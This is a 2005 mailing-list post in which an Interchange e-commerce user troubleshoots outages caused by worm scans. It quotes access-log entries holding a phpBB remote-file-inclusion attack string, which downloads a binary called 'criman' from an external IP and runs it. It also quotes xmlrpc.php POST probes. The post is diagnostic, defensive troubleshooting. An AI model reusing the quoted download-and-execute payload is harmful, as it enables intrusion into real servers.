[ic] mod_interchange and Apache MaxClients

John1 list_subscriber at yahoo.co.uk
Sat Dec 17 12:05:11 EST 2005 

On Thursday, December 01, 2005 9:18 PM, rphipps at reliant-solutions.com wrote:

>> From: interchange-users-bounces at icdevgroup.org
>> [mailto:interchange-users- bounces at icdevgroup.org] On Behalf Of Ron
>> Phipps
>> Sent: Thursday, December 01, 2005 9:24 AM
>>
>> We were visited this morning again by this worm and my script noticed
>> the site was not responding so IC was restarted.  It's definitely
>> something in this worm that is causing Apache/mod_interchange/ic to
>> hang up.  I'm setting up a test domain today with the cgi-bin access
>> method, I'll modify my script to then check this test domain when it
>> notices the main domain is not responding to see if IC can still
>> serve pages properly.  This will then narrow it down whether it's an
>> issue with IC or Apache/mod_interchange.
>>
>> Thanks,
>> -Ron
>
> I have setup a test domain and catalog which connects to the live IC
> server.  On this test site I have a page containing: "CGI UP".  When
> my script notices that the main site is not responding it will then
> try to hit the test site using the tlink cgi and will check for the
> result of "CGI UP".  This will tell us whether or not IC can be
> accessed via the CGI method when it cannot be access via
> mod_interchange.
>
> Our site was brought down for a 2nd time this morning by another worm
> trying to access exploits in awstats and xml-rpc.
>
Sorry for going quiet on this thread over the last few weeks, but things 
just a bit hectic at the moment - will hopefully have a bit more time after 
Christmas.

Ron, I was going to try to set up the CGI test domain like you have done but 
haven't had chance yet - have you reached any conclusions?  Will Interchange 
still respond via the tlink cgi?

Anyway, what has prompted me to post is that our site was brought down 4 
times yesterday, by a very similar (but different) script to before...

It is very clear that it is POST requests that are bringing Interchange 
down.  I am not sure whether it is the *content* of a particular POST 
request or whether it is just the fact that several POST requests are made 
in the space of a few seconds from the same client.

Explanation to why I conclude that POST requests are the culprit
=======================================

Just before the server goes down we see the below two entries in our log.

our_ip_address - - [16/Dec/2005:13:16:39] "GET 
/modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| 
HTTP/1.1" 404 259
our_ip_address - - [16/Dec/2005:13:16:40] "GET 
/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| 
HTTP/1.1" 404 251

Notice these are both GET requests.  There are no POST requests showing in 
the log.

So, I search Google for some information about the above worm and stumble 
across someone else's access log.  These are the entries in their log:

x.x.x.x - - [16/Dec/2005:11:49:40 -0600] "GET 
/modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| 
HTTP/1.1" 404 259
x.x.x.x - - [16/Dec/2005:11:49:42 -0600] "GET 
/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| 
HTTP/1.1" 404 251
x.x.x.x - - [16/Dec/2005:11:49:47 -0600] "POST /xmlrpc.php HTTP/1.1" 404 216
x.x.x.x - - [16/Dec/2005:11:49:48 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 
404 221
x.x.x.x - - [16/Dec/2005:11:49:50 -0600] "POST /blog/xmlsrv/xmlrpc.php 
HTTP/1.1" 404 228
x.x.x.x - - [16/Dec/2005:11:49:52 -0600] "POST /blogs/xmlsrv/xmlrpc.php 
HTTP/1.1" 404 229
x.x.x.x - - [16/Dec/2005:11:49:56 -0600] "POST /drupal/xmlrpc.php HTTP/1.1" 
404 223
x.x.x.x - - [16/Dec/2005:11:49:57 -0600] "POST /phpgroupware/xmlrpc.php 
HTTP/1.1" 404 229
x.x.x.x - - [16/Dec/2005:11:49:59 -0600] "POST /wordpress/xmlrpc.php 
HTTP/1.1" 404 226
x.x.x.x - - [16/Dec/2005:11:50:00 -0600] "POST /xmlrpc.php HTTP/1.1" 404 216
x.x.x.x - - [16/Dec/2005:11:50:02 -0600] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 
404 223
x.x.x.x - - [16/Dec/2005:11:50:03 -0600] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 
404 223

The above POST requests never made it to our access log, so it seems it is 
these POST requests, or the POST /xmlrpc.php specifically that is bringing 
down Interchange.

This is *exactly* the same behaviour as I was seeing a few weeks ago with 
the similar (but not identical) worm/hacking script, hence the conclusion 
earlier in this thread that it is the POST requests that are the problem.

Ron, do you see similar behaviour?

BTW, I found a couple of links to http flood utilities that could be used to 
test whether it is the spurious POST requests themselves that are causing 
the problem, or merely the fact that there is a quick succession of spurious 
POST requests from the same IP address.  Unforutnately, I haven't yet had 
chance to make any tests with these utilities myself, but here are the links 
in case anyone else thinks they may be useful for tests:
http://httpd.apache.org/test/flood/
http://support.microsoft.com/default.aspx?scid=kb;en-us;324094

Thanks for your help... 


		
___________________________________________________________ 
NEW Yahoo! Cars - sell your car and browse thousands of new and used cars online! http://uk.cars.yahoo.com/

More information about the interchange-users mailing list